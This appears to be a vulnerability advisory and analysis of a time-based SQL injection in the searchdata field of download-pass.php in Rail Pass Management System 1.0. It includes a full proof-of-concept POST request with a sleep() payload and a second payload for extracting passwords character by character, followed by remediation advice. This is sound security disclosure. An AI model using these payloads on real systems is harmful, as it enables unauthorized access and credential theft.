Rail Pass Management System 1.0 - Time-Based SQL Injection

Rail Pass Management System 1.0 – Time-Based SQL Injection Vulnerability Analysis

Security vulnerabilities in web applications remain a persistent threat, especially in systems that handle sensitive data like access credentials, user records, or transportation passes. One such example is the Rail Pass Management System 1.0, a PHP-based application developed by phpgurukul.com. This system, intended for managing rail pass issuance and tracking, has been found to contain a critical time-based SQL injection flaw in its download-pass.php endpoint.

Overview of the Vulnerability

The vulnerability exists in the searchdata parameter of the search function within download-pass.php. When users input data into the search field, the system processes the query directly without proper sanitization or parameterized queries. This allows an attacker to inject malicious SQL payloads that trigger delays in database execution—specifically, using the sleep() function.

This type of attack is classified as a time-based SQL injection, where the attacker observes the response time of the server to determine whether their payload was executed. Unlike classic Boolean-based injections, time-based attacks do not rely on binary responses (true/false), but instead exploit the database’s ability to pause execution for a specified duration.

Proof of Concept: Exploitation Steps

Attackers can exploit this vulnerability by sending a crafted POST request with the searchdata parameter set to a payload that forces the database to delay processing.

POST /rpms/download-pass.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b

searchdata=1'or+sleep(5)--+-&search=

Explanation: The payload 1'or+sleep(5)--+- is designed to exploit the SQL query structure. It breaks down as follows:

• 1' – closes the existing string literal in the query, effectively ending the original condition.
• or sleep(5) – introduces a logical OR clause that triggers the MySQL sleep() function, pausing execution for 5 seconds.
• --+ – comments out the remainder of the query, preventing syntax errors.

When this payload is sent, the server response time increases by at least 5 seconds. This delay is a clear indicator that the database executed the malicious code—confirming the presence of a SQL injection vulnerability.

Why Time-Based Injection is Effective

Time-based SQL injection is particularly effective in environments where:

• Output is hidden or not directly visible (e.g., no error messages or visible data changes).
• Firewalls or WAFs block simple Boolean-based payloads.
• SQL injection detection systems rely on pattern matching (e.g., detecting OR 1=1).

By using sleep() or similar functions (e.g., benchmark() in MySQL), attackers can bypass detection mechanisms while still confirming successful injection through timing differences.

Impact and Risks

Risk Factor	Description
Database Exposure	Attackers can extract sensitive data (e.g., user IDs, pass details, personal information) by chaining multiple time-based queries.
Denial of Service (DoS)	Repeated injection attempts with increasing sleep durations can overwhelm the server, causing service disruption.
Privilege Escalation	With enough time-based data extraction, attackers may infer database schema and gain access to administrative functions.

Given that this system is intended for managing rail passes—potentially involving passenger data, travel schedules, and authorization—this vulnerability could lead to unauthorized access, data leaks, or even impersonation attacks.

Real-World Use Case: Data Extraction via Time-Based Injection

Once the vulnerability is confirmed, attackers can use a systematic approach to extract information:

searchdata=1'or+sleep(1)and+substring((select+password+from+users+limit+1),1,1)='a'--+-&search=

Explanation: This payload checks whether the first character of the password field in the users table is a. If it is, the query will sleep for 1 second; otherwise, it will return immediately. By testing each character sequentially, an attacker can reconstruct the password over time.

While this process is slow, it is stealthy and difficult to detect with traditional intrusion detection systems.

Security Recommendations

To prevent such vulnerabilities, developers should implement the following best practices:

• Use Parameterized Queries – Always use prepared statements (e.g., PDO or MySQLi with placeholders) to avoid direct SQL string concatenation.
• Input Sanitization – Validate and sanitize user input using whitelisting or strict regex patterns.
• Disable Dangerous Functions – Restrict or disable SQL functions like sleep(), benchmark(), or load_file() in production environments.
• Enable Logging & Monitoring – Track abnormal response times and SQL execution patterns to detect injection attempts.
• Apply WAF Rules – Use Web Application Firewalls (WAFs) to block known injection patterns, including time-based payloads.

Conclusion

The Rail Pass Management System 1.0 serves as a cautionary example of how even seemingly simple applications can harbor serious security flaws. The time-based SQL injection vulnerability in download-pass.php demonstrates that attackers can exploit delays in response time to confirm and extract data without triggering obvious alerts.

As cyber threats evolve, developers must prioritize secure coding practices, especially when handling sensitive data. The use of time-based injection underscores the need for proactive security measures—not just reactive fixes.